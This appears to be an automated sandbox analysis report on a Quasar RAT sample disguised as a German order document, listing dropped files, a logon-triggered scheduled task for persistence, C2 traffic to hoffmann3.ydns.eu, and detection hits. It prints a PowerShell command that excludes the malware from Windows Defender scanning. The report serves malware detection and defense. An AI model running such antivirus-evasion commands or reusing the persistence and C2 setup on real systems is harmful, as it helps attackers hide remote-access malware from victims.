                                                                          SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuT3v
                                                                          MD5:CEF9DDD11786D93E245BC2F7AFEA2695
                                                                          SHA1:B0B56D8A0526FBF87BD5AEEA34173EAF791CB548
                                                                          SHA-256:C2EE4D84CFB927B657FB902D6D84876A95F1D71045C1B3189951753CF7E600CD
                                                                          SHA-512:939E3C048105CCCDB6A9DCF2C690B3F3D4E26215541A86010F39D7762AC16CBD8BAE7B6A1D3DB01ED8B767956C5B148BB0C8F12BF27F7C52D2C27F8A62F2B1F4
                                                                          Malicious:true
                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                          C:\Users\user\AppData\Local\Temp\tmpD780.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          File Type:XML 1.0 document, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):1585
                                                                          Entropy (8bit):5.116600636957861
                                                                          Encrypted:false
                                                                          SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuT3v
                                                                          MD5:CEF9DDD11786D93E245BC2F7AFEA2695
                                                                          SHA1:B0B56D8A0526FBF87BD5AEEA34173EAF791CB548
                                                                          SHA-256:C2EE4D84CFB927B657FB902D6D84876A95F1D71045C1B3189951753CF7E600CD
                                                                          SHA-512:939E3C048105CCCDB6A9DCF2C690B3F3D4E26215541A86010F39D7762AC16CBD8BAE7B6A1D3DB01ED8B767956C5B148BB0C8F12BF27F7C52D2C27F8A62F2B1F4
                                                                          Malicious:false
                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                          C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3842568
                                                                          Entropy (8bit):7.9808921731023705
                                                                          Encrypted:false
                                                                          SSDEEP:98304:ZrAsTIZbqqBQjwske/pCT66UNYekeWY0CE9:ZcCSL0ke/pO5ekeWtCE9
                                                                          MD5:15F259B30EC72A5217144834F7F5B564
                                                                          SHA1:BAED3FE7D059A497F856E263431CCD3872EF1EA1
                                                                          SHA-256:01DE053D9560D419F0B6C35DBDDB1175EB1FD7A21450989332024B812D39C4C2
                                                                          SHA-512:5E1148A9CF8008B7C38D067EC34E5C3BC7255341D114476532F8111EA2C3E654EB70B0A439AAAEA22543576F09B9CEC269F9B3414A6A24FC54B89C7C677C5F47
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 47%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.Ng..............0...:..P.......8:.. ...@:...@.. ........................:...........@.................................P8:.K....@:.hM...........l:..6....:...................................................... ............... ..H............text.....:.. ....:................. ..`.rsrc...hM...@:..N....:.............@..@.reloc........:......j:.............@..B.................8:.....H.........9...................9..........................................Fpn..|8.&}4.ah..kp.z...`...r6...B.L9.P..Pj$.P^I..;...7..M...t... ..;}. B...M.....Z.z4.........4'@.g.+..'..Q.....am.....1...........:.<.....U..`.a.5..w#.Yw..0v.v.N..=..d....J.L.{.........5O.....X.s7.T.7Z...izt.R.OS.B..n$[b..{-...yDwj{U.n..E.U.9?.s%.IH..s.;.....?.. .........%....BH.h`.7...2o...U.k............X2\.{.6...|...".}...<.0.../....A.j....@i^.e.,.s..........0..........(....*...0..

                                                                          C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3842568
                                                                          Entropy (8bit):7.9808921731023705
                                                                          Encrypted:false
                                                                          SSDEEP:98304:ZrAsTIZbqqBQjwske/pCT66UNYekeWY0CE9:ZcCSL0ke/pO5ekeWtCE9
                                                                          MD5:15F259B30EC72A5217144834F7F5B564
                                                                          SHA1:BAED3FE7D059A497F856E263431CCD3872EF1EA1
                                                                          SHA-256:01DE053D9560D419F0B6C35DBDDB1175EB1FD7A21450989332024B812D39C4C2
                                                                          SHA-512:5E1148A9CF8008B7C38D067EC34E5C3BC7255341D114476532F8111EA2C3E654EB70B0A439AAAEA22543576F09B9CEC269F9B3414A6A24FC54B89C7C677C5F47
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 47%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.Ng..............0...:..P.......8:.. ...@:...@.. ........................:...........@.................................P8:.K....@:.hM...........l:..6....:...................................................... ............... ..H............text.....:.. ....:................. ..`.rsrc...hM...@:..N....:.............@..@.reloc........:......j:.............@..B.................8:.....H.........9...................9..........................................Fpn..|8.&}4.ah..kp.z...`...r6...B.L9.P..Pj$.P^I..;...7..M...t... ..;}. B...M.....Z.z4.........4'@.g.+..'..Q.....am.....1...........:.<.....U..`.a.5..w#.Yw..0v.v.N..=..d....J.L.{.........5O.....X.s7.T.7Z...izt.R.OS.B..n$[b..{-...yDwj{U.n..E.U.9?.s%.IH..s.;.....?.. .........%....BH.h`.7...2o...U.k............X2\.{.6...|...".}...<.0.../....A.j....@i^.e.,.s..........0..........(....*...0..

                                                                          C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe:Zone.Identifier

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):7.9808921731023705
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:Bestellung - 021224 - 901003637.exe
                                                                          File size:3'842'568 bytes
                                                                          MD5:15f259b30ec72a5217144834f7f5b564
                                                                          SHA1:baed3fe7d059a497f856e263431ccd3872ef1ea1
                                                                          SHA256:01de053d9560d419f0b6c35dbddb1175eb1fd7a21450989332024b812d39c4c2
                                                                          SHA512:5e1148a9cf8008b7c38d067ec34e5c3bc7255341d114476532f8111ea2c3e654eb70b0a439aaaea22543576f09b9cec269f9b3414a6a24fc54b89c7c677c5f47
                                                                          SSDEEP:98304:ZrAsTIZbqqBQjwske/pCT66UNYekeWY0CE9:ZcCSL0ke/pO5ekeWtCE9
                                                                          TLSH:250633497150F94FC853CA304FA0EDB9BE287D96E306C313A5D71DABF46E99A8E041D2
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.Ng..............0...:..P.......8:.. ...@:...@.. ........................:...........@................................

                                                                          File Icon

                                                                          Icon Hash:033424c4c199d839

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x7a389e
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:true
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x674E9F60 [Tue Dec 3 06:04:16 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Authenticode Signature

                                                                          Signature Valid:false
                                                                          Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                          Error Number:-2146869232
                                                                          Not Before, Not After
                                                                          • 12/11/2018 19:00:00 08/11/2021 18:59:59
                                                                          Subject Chain
                                                                          • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                          Version:3
                                                                          Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                          Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                          Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                          Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3a38500x4b.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3a40000x4d68.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x3a6c000x3608
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x3aa0000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000x3a18a40x3a1a00f34b8469619a2ab51e579629b7670fa1unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x3a40000x4d680x4e00900ec867e9d31d5d1f18ad30d0c6ff23False0.9449118589743589data7.788163390058187IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x3aa0000xc0x2008dc44982f552ea9fd6e21d78c87d7f51False0.044921875MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 ":"0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x3a41300x46f9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9932852661126094
                                                                          RT_GROUP_ICON0x3a882c0x14data1.05
                                                                          RT_VERSION0x3a88400x338data0.441747572815534
                                                                          RT_MANIFEST0x3a8b780x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                          Imports

                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain

                                                                          Network Behavior

                                                                          Suricata IDS Alerts

                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-12-03T14:53:52.621028+01002027619ET MALWARE Observed Malicious SSL Cert (Quasar CnC)1193.34.212.175829192.168.2.849713TCP
                                                                          2024-12-03T14:53:52.621028+01002035595ET MALWARE Generic AsyncRAT Style SSL Cert1193.34.212.175829192.168.2.849713TCP

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 3, 2024 14:53:51.084609985 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:53:51.204581976 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:53:51.204720020 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:53:51.223316908 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:53:51.343363047 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:53:52.495695114 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:53:52.495810986 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:53:52.495860100 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:53:52.501071930 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:53:52.621027946 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:53:52.933974981 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:53:53.161572933 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:53:55.399147034 CET49716443192.168.2.8103.126.138.87
                                                                          Dec 3, 2024 14:53:55.399193048 CET44349716103.126.138.87192.168.2.8
                                                                          Dec 3, 2024 14:53:55.399472952 CET49716443192.168.2.8103.126.138.87
                                                                          Dec 3, 2024 14:53:55.400734901 CET49716443192.168.2.8103.126.138.87
                                                                          Dec 3, 2024 14:53:55.400746107 CET44349716103.126.138.87192.168.2.8
                                                                          Dec 3, 2024 14:53:57.671169043 CET44349716103.126.138.87192.168.2.8
                                                                          Dec 3, 2024 14:53:57.671238899 CET49716443192.168.2.8103.126.138.87
                                                                          Dec 3, 2024 14:53:57.675523996 CET49716443192.168.2.8103.126.138.87
                                                                          Dec 3, 2024 14:53:57.675538063 CET44349716103.126.138.87192.168.2.8
                                                                          Dec 3, 2024 14:53:57.675784111 CET44349716103.126.138.87192.168.2.8
                                                                          Dec 3, 2024 14:53:57.712079048 CET49716443192.168.2.8103.126.138.87
                                                                          Dec 3, 2024 14:53:57.755331039 CET44349716103.126.138.87192.168.2.8
                                                                          Dec 3, 2024 14:53:58.268071890 CET44349716103.126.138.87192.168.2.8
                                                                          Dec 3, 2024 14:53:58.268157005 CET44349716103.126.138.87192.168.2.8
                                                                          Dec 3, 2024 14:53:58.268219948 CET49716443192.168.2.8103.126.138.87
                                                                          Dec 3, 2024 14:53:58.626985073 CET49716443192.168.2.8103.126.138.87
                                                                          Dec 3, 2024 14:53:58.878453970 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:53:58.998687983 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:53:58.998745918 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:53:59.121752024 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:53:59.438152075 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:53:59.491687059 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:53:59.629101992 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:53:59.702174902 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:54:24.630366087 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:54:24.750422955 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:54:49.755800962 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:54:49.876039982 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:55:15.010006905 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:55:15.129926920 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:55:40.177249908 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:55:40.297209024 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:56:05.364789963 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:56:05.487390041 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:56:30.489820957 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:56:30.610080004 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:56:55.692991018 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:56:55.813019991 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:57:20.927375078 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:57:21.048914909 CET582949713193.34.212.17192.168.2.8
                                                                          Dec 3, 2024 14:57:46.052442074 CET497135829192.168.2.8193.34.212.17
                                                                          Dec 3, 2024 14:57:46.172563076 CET582949713193.34.212.17192.168.2.8

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 3, 2024 14:53:50.460360050 CET6236153192.168.2.81.1.1.1
                                                                          Dec 3, 2024 14:53:51.009383917 CET53623611.1.1.1192.168.2.8
                                                                          Dec 3, 2024 14:53:55.256530046 CET6317553192.168.2.81.1.1.1
                                                                          Dec 3, 2024 14:53:55.394778013 CET53631751.1.1.1192.168.2.8

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Dec 3, 2024 14:53:50.460360050 CET192.168.2.81.1.1.10x64ecStandard query (0)hoffmann3.ydns.euA (IP address)IN (0x0001)false
                                                                          Dec 3, 2024 14:53:55.256530046 CET192.168.2.81.1.1.10xad0cStandard query (0)ipwho.isA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Dec 3, 2024 14:53:51.009383917 CET1.1.1.1192.168.2.80x64ecNo error (0)hoffmann3.ydns.eu193.34.212.17A (IP address)IN (0x0001)false
                                                                          Dec 3, 2024 14:53:53.205018997 CET1.1.1.1192.168.2.80x93e2No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                          Dec 3, 2024 14:53:53.205018997 CET1.1.1.1192.168.2.80x93e2No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                          Dec 3, 2024 14:53:55.394778013 CET1.1.1.1192.168.2.80xad0cNo error (0)ipwho.is103.126.138.87A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • ipwho.is

                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.849716103.126.138.874436088C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-03 13:53:57 UTC150OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
                                                                          Host: ipwho.is
                                                                          Connection: Keep-Alive
                                                                          2024-12-03 13:53:58 UTC223INHTTP/1.1 200 OK
                                                                          Date: Tue, 03 Dec 2024 13:53:57 GMT
                                                                          Content-Type: application/json; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Server: ipwhois
                                                                          Access-Control-Allow-Headers: *
                                                                          X-Robots-Tag: noindex
                                                                          2024-12-03 13:53:58 UTC1021INData Raw: 33 66 31 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f
                                                                          Data Ascii: 3f1{ "About Us": "https:\/\/ipwhois.io", "ip": "8.46.123.228", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "New Yo


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:08:53:33
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"
                                                                          Imagebase:0x2d0000
                                                                          File size:3'842'568 bytes
                                                                          MD5 hash:15F259B30EC72A5217144834F7F5B564
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.1448519828.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:3
                                                                          Start time:08:53:36
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"
                                                                          Imagebase:0xb90000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:4
                                                                          Start time:08:53:36
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
